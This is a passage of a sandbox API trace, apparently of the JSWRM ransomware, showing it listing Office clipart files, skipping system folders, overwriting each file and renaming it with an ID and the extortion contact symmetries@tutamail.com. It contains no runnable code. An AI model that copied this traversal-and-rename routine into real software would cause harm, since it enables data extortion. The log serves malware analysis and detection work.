[0086.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185842.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185842.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0086.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0086.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185842.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185842.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185842.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0086.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0086.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0086.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0086.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185842.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.760] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14308) returned 1 [0086.760] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x37e0) returned 0x24d210 [0086.761] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x37e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x37e0, lpOverlapped=0x0) returned 1 [0086.763] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.764] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x37e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x37e0, lpOverlapped=0x0) returned 1 [0086.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.764] CloseHandle (hObject=0x314) returned 1 [0086.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0086.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0086.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0086.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0086.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0086.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0086.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0086.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0086.764] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185842.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185842.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0086.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0086.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0086.765] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21da, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0186346.WMF", cAlternateFileName="")) returned 1 [0086.765] lstrcmpiW (lpString1="J0186346.WMF", lpString2=".") returned 1 [0086.765] lstrcmpiW (lpString1="J0186346.WMF", lpString2="..") returned 1 [0086.765] lstrcmpiW (lpString1="J0186346.WMF", lpString2="...") returned 1 [0086.765] lstrcmpiW (lpString1="J0186346.WMF", lpString2="windows") returned -1 [0086.765] lstrcmpiW (lpString1="J0186346.WMF", lpString2="recovery") returned -1 [0086.765] lstrcmpiW (lpString1="J0186346.WMF", lpString2="perflogs") returned -1 [0086.765] lstrcmpiW (lpString1="J0186346.WMF", lpString2="documents and settings") returned 1 [0086.765] lstrcmpiW (lpString1="J0186346.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.765] lstrcmpiW (lpString1="J0186346.WMF", lpString2="system volume information") returned -1 [0086.765] lstrcmpiW (lpString1="J0186346.WMF", lpString2="msocache") returned -1 [0086.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0086.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186346.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186346.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0186346.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0086.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186346.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186346.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0186346.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0086.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0086.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186346.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.766] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8666) returned 1 [0086.766] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x21d0) returned 0x205850 [0086.766] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x21d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x21d0, lpOverlapped=0x0) returned 1 [0086.768] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.768] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x21d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x21d0, lpOverlapped=0x0) returned 1 [0086.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.768] CloseHandle (hObject=0x314) returned 1 [0086.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0086.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0086.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0086.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0086.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0086.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0086.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.769] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186346.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186346.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0086.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0086.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.769] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x843a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0186360.WMF", cAlternateFileName="")) returned 1 [0086.769] lstrcmpiW (lpString1="J0186360.WMF", lpString2=".") returned 1 [0086.769] lstrcmpiW (lpString1="J0186360.WMF", lpString2="..") returned 1 [0086.769] lstrcmpiW (lpString1="J0186360.WMF", lpString2="...") returned 1 [0086.769] lstrcmpiW (lpString1="J0186360.WMF", lpString2="windows") returned -1 [0086.769] lstrcmpiW (lpString1="J0186360.WMF", lpString2="recovery") returned -1 [0086.770] lstrcmpiW (lpString1="J0186360.WMF", lpString2="perflogs") returned -1 [0086.770] lstrcmpiW (lpString1="J0186360.WMF", lpString2="documents and settings") returned 1 [0086.770] lstrcmpiW (lpString1="J0186360.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.770] lstrcmpiW (lpString1="J0186360.WMF", lpString2="system volume information") returned -1 [0086.770] lstrcmpiW (lpString1="J0186360.WMF", lpString2="msocache") returned -1 [0086.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0086.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186360.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186360.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0186360.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0086.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0086.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186360.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186360.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0186360.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0086.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0086.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0086.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0086.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186360.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.771] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33850) returned 1 [0086.771] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8430) returned 0x24d210 [0086.771] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8430, lpOverlapped=0x0) returned 1 [0086.813] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.813] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8430, lpOverlapped=0x0) returned 1 [0086.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.814] CloseHandle (hObject=0x314) returned 1 [0086.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0086.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0086.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0086.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0086.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0086.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0086.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.815] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186360.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186360.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0086.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0086.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0086.816] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x44fe, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0186362.WMF", cAlternateFileName="")) returned 1 [0086.816] lstrcmpiW (lpString1="J0186362.WMF", lpString2=".") returned 1 [0086.816] lstrcmpiW (lpString1="J0186362.WMF", lpString2="..") returned 1 [0086.816] lstrcmpiW (lpString1="J0186362.WMF", lpString2="...") returned 1 [0086.816] lstrcmpiW (lpString1="J0186362.WMF", lpString2="windows") returned -1 [0086.816] lstrcmpiW (lpString1="J0186362.WMF", lpString2="recovery") returned -1 [0086.816] lstrcmpiW (lpString1="J0186362.WMF", lpString2="perflogs") returned -1 [0086.816] lstrcmpiW (lpString1="J0186362.WMF", lpString2="documents and settings") returned 1 [0086.816] lstrcmpiW (lpString1="J0186362.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.816] lstrcmpiW (lpString1="J0186362.WMF", lpString2="system volume information") returned -1 [0086.816] lstrcmpiW (lpString1="J0186362.WMF", lpString2="msocache") returned -1 [0086.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0086.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186362.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186362.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0186362.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0086.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186362.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186362.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0186362.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0086.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0086.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0086.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF" (normalized: "c:\\program files\\microsoft 